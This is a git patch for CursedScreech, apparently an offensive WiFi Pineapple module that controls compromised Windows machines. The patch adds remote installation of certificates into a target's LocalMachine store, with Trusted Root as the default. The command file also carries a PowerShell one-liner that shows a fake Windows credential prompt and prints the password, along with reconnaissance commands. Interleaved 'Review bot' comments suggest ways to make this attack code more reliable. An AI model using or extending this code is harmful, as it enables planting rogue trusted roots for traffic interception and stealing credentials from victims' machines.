From 78163214eb2b521524b7610c9e5e74eeb41deddc Mon Sep 17 00:00:00 2001
From: sud0nick
Date: Fri, 5 Jan 2018 23:07:00 -0500
Subject: [PATCH] Update 1.3
---
 CursedScreech/api/module.php | 8 +--
 CursedScreech/includes/changelog/Version 1.3 | 5 ++
 CursedScreech/includes/forest/ezcmds | 1 +
 CursedScreech/includes/forest/target.py | 2 +-
 CursedScreech/includes/scripts/testEncrypt.sh | 2 +-
 CursedScreech/js/module.js | 55 +++++++++++++++++--
 CursedScreech/module.html | 19 ++++++-
 CursedScreech/module.info | 4 +-
 8 files changed, 81 insertions(+), 15 deletions(-)
 create mode 100644 CursedScreech/includes/changelog/Version 1.3
diff --git a/CursedScreech/api/module.php b/CursedScreech/api/module.php
index 8791a25..de21987 100755
--- a/CursedScreech/api/module.php
+++ b/CursedScreech/api/module.php
@@ -422,7 +422,7 @@ class CursedScreech extends Module {
 $files = scandir(__API_DL__);
 $success = true;
 foreach ($files as $file) {
- if ($file == "." || $file == "..") {continue;}
+ if (substr($file, 0, 1) == ".") {continue;}
 if (!unlink(__API_DL__ . $file)) {
 $success = false;
 }
@@ -449,7 +449,7 @@ class CursedScreech extends Module {
 $files = [];
 foreach (scandir(__PAYLOADS__) as $file) {
- if ($file == "." || $file == "..") {continue;}
+ if (substr($file, 0, 1) == ".") {continue;}
 $files[$file] = __PAYLOADS__;
 }
 $this->respond(true, null, $files);
@@ -521,7 +521,7 @@ class CursedScreech extends Module {
 $dir = ($type == "error") ? __LOGS__ : (($type == "targets") ? __TARGETLOGS__ : __CHANGELOGS__);
 $contents = array();
 foreach (scandir($dir) as $log) {
- if ($log == "." || $log == "..") {continue;}
+ if (substr($log, 0, 1) == ".") {continue;}
 array_push($contents, $log);
 }
 $this->respond(true, null, $contents);
@@ -575,7 +575,7 @@ class CursedScreech extends Module {
 $keys = scandir($dir);
 $certs = array();
 foreach ($keys as $key) {
- if ($key == "." || $key == "..") {continue;}
+ if (substr($key, 0, 1) == ".") {continue;}
 $parts = explode(".", $key);
 $fname = $parts[0];
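Review bot: The delete loop in the `@@ -422` hunk now leaves every dot-prefixed file in `__API_DL__` in place while `$success` stays true, so a clear is reported as complete with hidden files still on disk, and neither the commit message nor the changelog mentions the change. If the aim is to protect a placeholder file, say so above the test, e.g. `// dotfiles are kept on purpose; only visible downloads are removed`; otherwise keep the old `.`/`..` test in this loop. The listing loops in the `@@ -449`, `@@ -521` and `@@ -575` hunks repeat the same test with a loose `==`; one private helper such as `private function isHidden($name) { return substr($name, 0, 1) === "."; }` would keep the four copies in step. None of the loops handles `scandir()` returning `false`, and all four enclosing methods begin and end outside the hunks.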
diff --git a/CursedScreech/includes/changelog/Version 1.3 b/CursedScreech/includes/changelog/Version 1.3
new file mode 100644
index 0000000..9d5c0de
--- /dev/null
+++ b/CursedScreech/includes/changelog/Version 1.3
@@ -0,0 +1,5 @@
+January 5, 2018
+

+ - Modified hook into Papers to work with the latest release
+ - Added ability to install a certificate on a target Windows machine
+
\ No newline at end of file
diff --git a/CursedScreech/includes/forest/ezcmds b/CursedScreech/includes/forest/ezcmds
index 358600a..11b2bf9 100755
--- a/CursedScreech/includes/forest/ezcmds
+++ b/CursedScreech/includes/forest/ezcmds
@@ -1,4 +1,5 @@
 Send File:C:\Temp\
+Install Cert:powershell "Import-Certificate -FilePath $cert -CertStoreLocation $store"
 Get PS Version:powershell "$PSVersionTable"
 Get SysInfo:powershell "gwmi Win32_QuickFixEngineering | Select Description, HotFixID, InstalledBy, InstalledOn; gwmi Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, BootDevice, BuildNumber, CSName, CSDVersion, NumberOfUsers, Version | FL"
 Windows PSv3+ Phish:powershell "Get-Credential -User $(whoami).Split('\')[1] -Message 'Windows requires your credentials to continue' | % {Write-Host $_.UserName '->' $_.GetNetworkCredential().password}"
diff --git a/CursedScreech/includes/forest/target.py b/CursedScreech/includes/forest/target.py
index e79eb7e..07900ba 100755
--- a/CursedScreech/includes/forest/target.py
+++ b/CursedScreech/includes/forest/target.py
@@ -14,7 +14,7 @@ with open(settingsFile, "r") as sFile:
 if params[0] == "activity_log":
 activity_log = params[1]
 elif params[0] == "kuro_key":
- priv_key = params[1] + ".pem"
+ priv_key = params[1] + ".key"
 pub_cer = params[1] + ".cer"
 elif params[0] == "target_key":
 client_key = params[1] + ".cer"
diff --git a/CursedScreech/includes/scripts/testEncrypt.sh b/CursedScreech/includes/scripts/testEncrypt.sh
index 10821e1..bffb14f 100755
--- a/CursedScreech/includes/scripts/testEncrypt.sh
+++ b/CursedScreech/includes/scripts/testEncrypt.sh
@@ -23,7 +23,7 @@ while [ "$#" -gt 0 ]
 do
 if [[ "$1" == "-k" ]]; then
- KEY="$2.pem"
+ KEY="$2.key"
 fi
 if [[ "$1" == "-d" ]]; then
 KEYDIR="$2"
diff --git a/CursedScreech/js/module.js b/CursedScreech/js/module.js
index 0b7cd89..2349b2c 100755
--- a/CursedScreech/js/module.js
+++ b/CursedScreech/js/module.js
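Review bot: The `Install Cert` entry is the only line in `ezcmds` whose command carries template placeholders (`$cert`, `$store`), and nothing in the file or the changelog says that module.js has to substitute them before the command is sent. Because `$name` is also PowerShell variable syntax, an unsubstituted copy of the line would not fail visibly; the two names would simply expand as empty variables, so a marker that cannot be mistaken for a variable, such as `{cert}` and `{store}`, would make that case detectable. The command writes to a `LocalMachine` certificate store, which changes machine-wide trust on the host and persists until the entry is removed; the changelog line should state that, and the commit adds no matching removal entry.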
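Review bot: `priv_key` now resolves to `<name>.key`, and the testEncrypt.sh hunk makes the same switch for `KEY`, but nothing visible in this commit renames or falls back to private-key files that a 1.2 install already holds as `.pem`. If the settings file still names such a key, whatever opens `priv_key` later in target.py (outside the hunk) would presumably fail with a missing-file error. Either add a changelog line such as `- Private keys now use the .key extension; regenerate or rename existing .pem keys`, or fall back when the `.key` file is absent.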
@@ -51,6 +51,22 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 $scope.newCmdName = "";
 $scope.newCmdCommand = "";
 $scope.checkAllTargets = false;
+ $scope.target_installKey = "";
+ $scope.certStores = [
+ {"ID":"Root", "Name":"Trusted Root Certification Authorities"},
+ {"ID":"My", "Name":"Personal"},
+ {"ID":"Remote Desktop", "Name":"Remote Desktop"},
+ {"ID":"Trust", "Name":"Enterprise Trust"},
+ {"ID":"CA", "Name":"Intermediate Certification Authorities"},
+ {"ID":"SmartCardRoot", "Name":"Smart Card Trusted Roots"},
+ {"ID":"TrustedPublisher", "Name":"Trusted Publishers"},
+ {"ID":"TrustedPeople", "Name":"Trusted People"},
+ {"ID":"ClientAuthIssuer", "Name":"Client Authentication Issuers"},
+ {"ID":"eSIM Certification Authorities", "Name":"eSIM Certification Authorities"},
+ {"ID":"Windows Live ID Token Issuer", "Name":"Windows Live ID Token Issuer"},
+ {"ID":"Homegroup Machine Certificates", "Name":"Homegroup Machine Certificates"}
+ ];
+ $scope.selectedCertStore = $scope.certStores[0];
 // Panes
 $scope.showTargetPane = true;
@@ -62,6 +78,7 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 $scope.uploading = false;
 $scope.selectedPayload = "";
 $scope.showPayloadSelect = false;
+ $scope.showCertSelect = false;
 // Interval vars
 $scope.stop;
@@ -313,6 +330,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 if ($scope.showPayloadSelect) {
 // ex: "sendfile;/pineapple/modules/CursedScreech/includes/payloads/NetCli.exe;C:\Temp\"
 cmd = "sendfile;" + $scope.payloadDir + $scope.selectedPayload.fileName + ";" + $scope.targetCommand;
+ } else if ($scope.showCertSelect) {
+ cmd = "sendfile;" + $scope.target_installKey + ";" + getEZCmd("Send File");
 } else {
 cmd = $scope.targetCommand;
 }
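Review bot: `$scope.selectedCertStore = $scope.certStores[0];` in the `@@ -51` hunk preselects `Root`, the store with the widest effect on a host's trust decisions, so a certificate can end up as a machine-wide trust anchor without the user ever having picked a store. Starting with no selection, `$scope.selectedCertStore = null;`, and refusing to send until one is chosen would make that choice explicit; the code in the later `@@ -321` hunk that reads `$scope.selectedCertStore.ID` would then need the same null check. A one-line comment above `$scope.certStores` stating that each `ID` is the store name appended to `Cert:\LocalMachine\` would also help, since several IDs contain spaces.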
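Review bot: The new `else if ($scope.showCertSelect)` branch in the `@@ -313` hunk builds the command from `$scope.target_installKey` and `getEZCmd("Send File")` without checking either value. With no certificate chosen the variable is still the `""` it was initialised to in the `@@ -51` hunk, and if the `Send File` entry is missing from `$scope.ezcmds` the lookup returns `undefined`, so the request goes out as `sendfile;;…` or ends in the text `undefined`. A guard ahead of the request, `if (!$scope.target_installKey || !getEZCmd("Send File")) { return; }`, would stop that. The enclosing handler starts and ends outside the hunk.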
@@ -321,7 +340,23 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 action: 'sendCommand',
 command: cmd,
 targets: checkedTargets
- },function(response){});
+ },function(response){
+
+ // Make a second API call to install the certificate
+ if ($scope.showCertSelect) {
+
+ cmd = $scope.targetCommand.replace("$cert", getEZCmd("Send File") + $scope.target_installKey.split("/").slice(-1)[0]).replace("$store", "'Cert:\\LocalMachine\\" + $scope.selectedCertStore.ID + "'")
+
+ $api.request({
+ module: 'CursedScreech',
+ action: 'sendCommand',
+ command: cmd,
+ targets: checkedTargets
+ },function(response){});
+
+ }
+
+ });
 });
 function getTargetIndex(sock){
@@ -458,23 +493,27 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 });
 $scope.ezCommandChange = (function(){
+ $scope.showPayloadSelect = false;
+ $scope.showCertSelect = false;
 if ($scope.selectedCmd === null) {
 $scope.targetCommand = "";
- $scope.showPayloadSelect = false;
 return;
 }
 for (key in $scope.ezcmds) {
 if ($scope.ezcmds[key] == $scope.selectedCmd) {
 if (key == "Send File") {
 $scope.showPayloadSelect = true;
- } else {
- $scope.showPayloadSelect = false;
+ } else if (key == "Install Cert") {
+ $scope.showCertSelect = true;
 }
 }
 }
 $scope.targetCommand = $scope.selectedCmd;
 });
+ function getEZCmd(key) {
+ return $scope.ezcmds[key];
+ }
 /* ============================================= */
 /* BEGIN KEY FUNCTIONS */
@@ -484,9 +523,15 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 if (type == "kuro") {
 $scope.selectKuroKey = true;
 $scope.selectTargetKey = false;
+ $scope.selectInstallKey = false;
 } else if (type == "target") {
 $scope.selectTargetKey = true;
 $scope.selectKuroKey = false;
+ $scope.selectInstallKey = false;
+ } else if (type == "install") {
+ $scope.selectInstallKey = true;
+ $scope.selectKuroKey = false;
+ $scope.selectTargetKey = false;
 }
 $api.request({
 module: 'CursedScreech',
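Review bot: The callback added in the `@@ -321` hunk issues the second request as soon as the first returns, never looks at `response`, and re-reads `$scope.showCertSelect`, `$scope.targetCommand` and `$scope.selectedCertStore` at that later moment, so a change in the form while the first call is in flight alters what is sent. Copy the three values into locals before the first `$api.request` and return early unless the first call reports success (the shape of `response` is not visible in this hunk). The file name and the store ID are also concatenated into the PowerShell text as they are, with the path left unquoted, so a name containing a space or a quote character changes the command that is built; reject such names before building `cmd`. The statement that assigns `cmd` has no terminating semicolon, and the enclosing handler begins outside the hunk.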
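Review bot: The three `select*Key` flags in the `@@ -484` hunk are mutually exclusive, yet every branch has to reset the other two by hand, and a `type` that matches none of the branches leaves the previous selection in force. One variable would carry the same state, `$scope.keySelectMode = type;`, with the handler in the `@@ -509` hunk testing `$scope.keySelectMode === "install"`; this assumes module.html does not bind to the individual flags, which cannot be confirmed from the visible markup. The enclosing function starts and ends outside the hunk.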
@@ -509,6 +554,8 @@ registerController('CursedScreechController', ['$api', '$scope', '$sce', '$inter
 $scope.settings_kuroKey = keyPath;
 } else if ($scope.selectTargetKey == true) {
 $scope.settings_targetKey = keyPath;
+ } else if ($scope.selectInstallKey == true) {
+ $scope.target_installKey = keyPath + ".cer";
 }
 });
diff --git a/CursedScreech/module.html b/CursedScreech/module.html
index d39ea37..783e293 100755
--- a/CursedScreech/module.html
+++ b/CursedScreech/module.html
@@ -234,14 +234,27 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
-
+

Remote upload path

-
+
+
+
+ +
+
+ +
+
+

Certificate Store

+ +
+
@@ -397,7 +410,7 @@ $(document).on('mouseenter', '.cs_hoverDanger', function() {
-
+
diff --git a/CursedScreech/module.info b/CursedScreech/module.info
index 7c83c87..54cdc2a 100755
--- a/CursedScreech/module.info
+++ b/CursedScreech/module.info
@@ -6,5 +6,5 @@
 "tetra"
 ],
 "title": "CursedScreech",
- "version": "1.2"
-}
\ No newline at end of file
+ "version": "1.3"
+}